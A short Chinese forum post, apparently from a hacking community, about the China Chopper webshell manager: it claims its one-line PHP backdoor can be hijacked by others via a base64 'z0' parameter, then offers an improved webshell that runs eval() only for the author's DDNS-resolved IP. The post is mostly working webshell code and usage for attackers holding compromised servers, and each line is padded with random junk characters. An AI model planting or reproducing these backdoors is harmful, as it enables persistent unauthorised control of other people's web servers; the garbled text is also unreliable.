今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞& b6 ^% A+ d' [/ \2 b
) g# k- E0 q" u3 Z i$ d" \
就算你设置了密码,使用了eval($_REQUEST['moyo']);9 F, R8 r, `. w3 _/ _% n2 b
! \" ~, Y1 ?1 \但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
' S4 B6 u# h0 a5 s) u: M% o& I: f2 O( Y
9 U( ]8 C( b! w6 ]0 R因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
5 Q3 y- M/ u9 e2 V# @4 z! T, o m" d9 l+ Y$ I2 r, e* c: I( e
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了% ~; R0 T. D4 S+ F* Y/ H/ Q. m3 s/ V
$ s( I: e+ I+ i- z0 z
不知道是设计缺陷还是故意留的后门5 t c0 i& M& ] g Y H
1 T7 _5 ] |% q2 n- e& l- n如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
& C, `, r7 H9 ?
+ R1 U& `) g2 L8 D3 h; B( g本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org2 T+ Z \* Z3 _6 @
, [2 a! N) Z, h4 \
然后一句话后门这样写
4 w k0 x5 F: S0 y/ m) M( ~/ e1 u: V Q6 I8 N4 l6 T a1 Y+ d
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
0 R: [6 b# g/ ^# N( g6 p这样就可以让一句话后门只允许自己的电脑连接了
# e% }1 l8 W9 G v) f, O' A' H5 Q h+ M x& [6 r4 H Z8 l1 i5 D5 `
|